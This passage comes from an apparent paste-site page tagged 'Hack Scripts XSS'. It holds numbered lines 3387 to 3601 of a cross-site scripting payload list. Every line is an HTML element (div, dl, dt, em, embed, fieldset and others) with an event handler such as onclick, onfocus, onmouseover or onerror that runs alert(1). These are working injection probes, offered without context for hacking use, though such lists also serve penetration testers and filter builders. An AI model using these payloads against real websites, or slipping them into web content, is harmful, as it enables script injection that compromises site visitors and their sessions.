  3387. <div onbeforecut="alert(1)" contenteditable>test</div>
  3388. <div onbeforepaste="alert(1)" contenteditable>test</div>
  3389. <div onblur=alert(1) tabindex=1 id=x></div><input autofocus>
  3390. <div onclick="alert(1)">test</div>
  3391. <div oncontextmenu="alert(1)">test</div>
  3392. <div oncopy="alert(1)" contenteditable>test</div>
  3393. <div oncut="alert(1)" contenteditable>test</div>
  3394. <div ondblclick="alert(1)">test</div>
  3395. <div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus>
  3396. <div onkeydown="alert(1)" contenteditable>test</div>
  3397. <div onkeypress="alert(1)" contenteditable>test</div>
  3398. <div onkeyup="alert(1)" contenteditable>test</div>
  3399. <div onmousedown="alert(1)">test</div>
  3400. <div onmouseenter="alert(1)">test</div>
  3401. <div onmouseleave="alert(1)">test</div>
  3402. <div onmousemove="alert(1)">test</div>
  3403. <div onmouseout="alert(1)">test</div>
  3404. <div onmouseover="alert(1)">test</div>
  3405. <div onmouseup="alert(1)">test</div>
  3406. <div onpaste="alert(1)" contenteditable>test</div>
  3407. <dl draggable="true" ondrag="alert(1)">test</dl>
  3408. <dl draggable="true" ondragend="alert(1)">test</dl>
  3409. <dl draggable="true" ondragenter="alert(1)">test</dl>
  3410. <dl draggable="true" ondragleave="alert(1)">test</dl>
  3411. <dl draggable="true" ondragstart="alert(1)">test</dl>
  3412. <dl id=x tabindex=1 onactivate=alert(1)></dl>
  3413. <dl id=x tabindex=1 onbeforeactivate=alert(1)></dl>
  3414. <dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus>
  3415. <dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus>
  3416. <dl id=x tabindex=1 onfocus=alert(1)></dl>
  3417. <dl id=x tabindex=1 onfocusin=alert(1)></dl>
  3418. <dl onbeforecopy="alert(1)" contenteditable>test</dl>
  3419. <dl onbeforecut="alert(1)" contenteditable>test</dl>
  3420. <dl onbeforepaste="alert(1)" contenteditable>test</dl>
  3421. <dl onblur=alert(1) tabindex=1 id=x></dl><input autofocus>
  3422. <dl onclick="alert(1)">test</dl>
  3423. <dl oncontextmenu="alert(1)">test</dl>
  3424. <dl oncopy="alert(1)" contenteditable>test</dl>
  3425. <dl oncut="alert(1)" contenteditable>test</dl>
  3426. <dl ondblclick="alert(1)">test</dl>
  3427. <dl onfocusout=alert(1) tabindex=1 id=x></dl><input autofocus>
  3428. <dl onkeydown="alert(1)" contenteditable>test</dl>
  3429. <dl onkeypress="alert(1)" contenteditable>test</dl>
  3430. <dl onkeyup="alert(1)" contenteditable>test</dl>
  3431. <dl onmousedown="alert(1)">test</dl>
  3432. <dl onmouseenter="alert(1)">test</dl>
  3433. <dl onmouseleave="alert(1)">test</dl>
  3434. <dl onmousemove="alert(1)">test</dl>
  3435. <dl onmouseout="alert(1)">test</dl>
  3436. <dl onmouseover="alert(1)">test</dl>
  3437. <dl onmouseup="alert(1)">test</dl>
  3438. <dl onpaste="alert(1)" contenteditable>test</dl>
  3439. <dt draggable="true" ondrag="alert(1)">test</dt>
  3440. <dt draggable="true" ondragend="alert(1)">test</dt>
  3441. <dt draggable="true" ondragenter="alert(1)">test</dt>
  3442. <dt draggable="true" ondragleave="alert(1)">test</dt>
  3443. <dt draggable="true" ondragstart="alert(1)">test</dt>
  3444. <dt id=x tabindex=1 onactivate=alert(1)></dt>
  3445. <dt id=x tabindex=1 onbeforeactivate=alert(1)></dt>
  3446. <dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus>
  3447. <dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus>
  3448. <dt id=x tabindex=1 onfocus=alert(1)></dt>
  3449. <dt id=x tabindex=1 onfocusin=alert(1)></dt>
  3450. <dt onbeforecopy="alert(1)" contenteditable>test</dt>
  3451. <dt onbeforecut="alert(1)" contenteditable>test</dt>
  3452. <dt onbeforepaste="alert(1)" contenteditable>test</dt>
  3453. <dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus>
  3454. <dt onclick="alert(1)">test</dt>
  3455. <dt oncontextmenu="alert(1)">test</dt>
  3456. <dt oncopy="alert(1)" contenteditable>test</dt>
  3457. <dt oncut="alert(1)" contenteditable>test</dt>
  3458. <dt ondblclick="alert(1)">test</dt>
  3459. <dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus>
  3460. <dt onkeydown="alert(1)" contenteditable>test</dt>
  3461. <dt onkeypress="alert(1)" contenteditable>test</dt>
  3462. <dt onkeyup="alert(1)" contenteditable>test</dt>
  3463. <dt onmousedown="alert(1)">test</dt>
  3464. <dt onmouseenter="alert(1)">test</dt>
  3465. <dt onmouseleave="alert(1)">test</dt>
  3466. <dt onmousemove="alert(1)">test</dt>
  3467. <dt onmouseout="alert(1)">test</dt>
  3468. <dt onmouseover="alert(1)">test</dt>
  3469. <dt onmouseup="alert(1)">test</dt>
  3470. <dt onpaste="alert(1)" contenteditable>test</dt>
  3471. <element draggable="true" ondrag="alert(1)">test</element>
  3472. <element draggable="true" ondragend="alert(1)">test</element>
  3473. <element draggable="true" ondragenter="alert(1)">test</element>
  3474. <element draggable="true" ondragleave="alert(1)">test</element>
  3475. <element draggable="true" ondragstart="alert(1)">test</element>
  3476. <element id=x tabindex=1 onactivate=alert(1)></element>
  3477. <element id=x tabindex=1 onbeforeactivate=alert(1)></element>
  3478. <element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus>
  3479. <element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus>
  3480. <element id=x tabindex=1 onfocus=alert(1)></element>
  3481. <element id=x tabindex=1 onfocusin=alert(1)></element>
  3482. <element onbeforecopy="alert(1)" contenteditable>test</element>
  3483. <element onbeforecut="alert(1)" contenteditable>test</element>
  3484. <element onbeforepaste="alert(1)" contenteditable>test</element>
  3485. <element onblur=alert(1) tabindex=1 id=x></element><input autofocus>
  3486. <element onclick="alert(1)">test</element>
  3487. <element oncontextmenu="alert(1)">test</element>
  3488. <element oncopy="alert(1)" contenteditable>test</element>
  3489. <element oncut="alert(1)" contenteditable>test</element>
  3490. <element ondblclick="alert(1)">test</element>
  3491. <element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus>
  3492. <element onkeydown="alert(1)" contenteditable>test</element>
  3493. <element onkeypress="alert(1)" contenteditable>test</element>
  3494. <element onkeyup="alert(1)" contenteditable>test</element>
  3495. <element onmousedown="alert(1)">test</element>
  3496. <element onmouseenter="alert(1)">test</element>
  3497. <element onmouseleave="alert(1)">test</element>
  3498. <element onmousemove="alert(1)">test</element>
  3499. <element onmouseout="alert(1)">test</element>
  3500. <element onmouseover="alert(1)">test</element>
  3501. <element onmouseup="alert(1)">test</element>
  3502. <element onpaste="alert(1)" contenteditable>test</element>
  3503. <em draggable="true" ondrag="alert(1)">test</em>
  3504. <em draggable="true" ondragend="alert(1)">test</em>
  3505. <em draggable="true" ondragenter="alert(1)">test</em>
  3506. <em draggable="true" ondragleave="alert(1)">test</em>
  3507. <em draggable="true" ondragstart="alert(1)">test</em>
  3508. <em id=x tabindex=1 onactivate=alert(1)></em>
  3509. <em id=x tabindex=1 onbeforeactivate=alert(1)></em>
  3510. <em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus>
  3511. <em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus>
  3512. <em id=x tabindex=1 onfocus=alert(1)></em>
  3513. <em id=x tabindex=1 onfocusin=alert(1)></em>
  3514. <em onbeforecopy="alert(1)" contenteditable>test</em>
  3515. <em onbeforecut="alert(1)" contenteditable>test</em>
  3516. <em onbeforepaste="alert(1)" contenteditable>test</em>
  3517. <em onblur=alert(1) tabindex=1 id=x></em><input autofocus>
  3518. <em onclick="alert(1)">test</em>
  3519. <em oncontextmenu="alert(1)">test</em>
  3520. <em oncopy="alert(1)" contenteditable>test</em>
  3521. <em oncut="alert(1)" contenteditable>test</em>
  3522. <em ondblclick="alert(1)">test</em>
  3523. <em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus>
  3524. <em onkeydown="alert(1)" contenteditable>test</em>
  3525. <em onkeypress="alert(1)" contenteditable>test</em>
  3526. <em onkeyup="alert(1)" contenteditable>test</em>
  3527. <em onmousedown="alert(1)">test</em>
  3528. <em onmouseenter="alert(1)">test</em>
  3529. <em onmouseleave="alert(1)">test</em>
  3530. <em onmousemove="alert(1)">test</em>
  3531. <em onmouseout="alert(1)">test</em>
  3532. <em onmouseover="alert(1)">test</em>
  3533. <em onmouseup="alert(1)">test</em>
  3534. <em onpaste="alert(1)" contenteditable>test</em>
  3535. <embed draggable="true" ondrag="alert(1)">test</embed>
  3536. <embed draggable="true" ondragend="alert(1)">test</embed>
  3537. <embed draggable="true" ondragenter="alert(1)">test</embed>
  3538. <embed draggable="true" ondragleave="alert(1)">test</embed>
  3539. <embed draggable="true" ondragstart="alert(1)">test</embed>
  3540. <embed id=x onfocus=alert(1) type=text/html>
  3541. <embed id=x onfocusin=alert(1) type=text/html>
  3542. <embed id=x tabindex=1 onactivate=alert(1)></embed>
  3543. <embed id=x tabindex=1 onbeforeactivate=alert(1)></embed>
  3544. <embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus>
  3545. <embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus>
  3546. <embed onbeforecopy="alert(1)" contenteditable>test</embed>
  3547. <embed onbeforecut="alert(1)" contenteditable>test</embed>
  3548. <embed onbeforepaste="alert(1)" contenteditable>test</embed>
  3549. <embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus>
  3550. <embed onclick="alert(1)">test</embed>
  3551. <embed oncontextmenu="alert(1)">test</embed>
  3552. <embed oncopy="alert(1)" contenteditable>test</embed>
  3553. <embed oncut="alert(1)" contenteditable>test</embed>
  3554. <embed ondblclick="alert(1)">test</embed>
  3555. <embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus>
  3556. <embed onkeydown="alert(1)" contenteditable>test</embed>
  3557. <embed onkeypress="alert(1)" contenteditable>test</embed>
  3558. <embed onkeyup="alert(1)" contenteditable>test</embed>
  3559. <embed onmousedown="alert(1)">test</embed>
  3560. <embed onmouseenter="alert(1)">test</embed>
  3561. <embed onmouseleave="alert(1)">test</embed>
  3562. <embed onmousemove="alert(1)">test</embed>
  3563. <embed onmouseout="alert(1)">test</embed>
  3564. <embed onmouseover="alert(1)">test</embed>
  3565. <embed onmouseup="alert(1)">test</embed>
  3566. <embed onpaste="alert(1)" contenteditable>test</embed>
  3567. <embed src=/ onload=alert(1)>
  3568. <embed src=1 onerror=alert(1) type=image/gif>
  3569. <fieldset draggable="true" ondrag="alert(1)">test</fieldset>
  3570. <fieldset draggable="true" ondragend="alert(1)">test</fieldset>
  3571. <fieldset draggable="true" ondragenter="alert(1)">test</fieldset>
  3572. <fieldset draggable="true" ondragleave="alert(1)">test</fieldset>
  3573. <fieldset draggable="true" ondragstart="alert(1)">test</fieldset>
  3574. <fieldset id=x tabindex=1 onactivate=alert(1)></fieldset>
  3575. <fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset>
  3576. <fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus>
  3577. <fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus>
  3578. <fieldset id=x tabindex=1 onfocus=alert(1)></fieldset>
  3579. <fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset>
  3580. <fieldset onbeforecopy="alert(1)" contenteditable>test</fieldset>
  3581. <fieldset onbeforecut="alert(1)" contenteditable>test</fieldset>
  3582. <fieldset onbeforepaste="alert(1)" contenteditable>test</fieldset>
  3583. <fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus>
  3584. <fieldset onclick="alert(1)">test</fieldset>
  3585. <fieldset oncontextmenu="alert(1)">test</fieldset>
  3586. <fieldset oncopy="alert(1)" contenteditable>test</fieldset>
  3587. <fieldset oncut="alert(1)" contenteditable>test</fieldset>
  3588. <fieldset ondblclick="alert(1)">test</fieldset>
  3589. <fieldset onfocusout=alert(1) tabindex=1 id=x></fieldset><input autofocus>
  3590. <fieldset onkeydown="alert(1)" contenteditable>test</fieldset>
  3591. <fieldset onkeypress="alert(1)" contenteditable>test</fieldset>
  3592. <fieldset onkeyup="alert(1)" contenteditable>test</fieldset>
  3593. <fieldset onmousedown="alert(1)">test</fieldset>
  3594. <fieldset onmouseenter="alert(1)">test</fieldset>
  3595. <fieldset onmouseleave="alert(1)">test</fieldset>
  3596. <fieldset onmousemove="alert(1)">test</fieldset>
  3597. <fieldset onmouseout="alert(1)">test</fieldset>
  3598. <fieldset onmouseover="alert(1)">test</fieldset>
  3599. <fieldset onmouseup="alert(1)">test</fieldset>
  3600. <fieldset onpaste="alert(1)" contenteditable>test</fieldset>
  3601. <figcaption draggable="true" ondrag="alert(1)">test</figcaption>
Tags: Hack Scripts XSS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement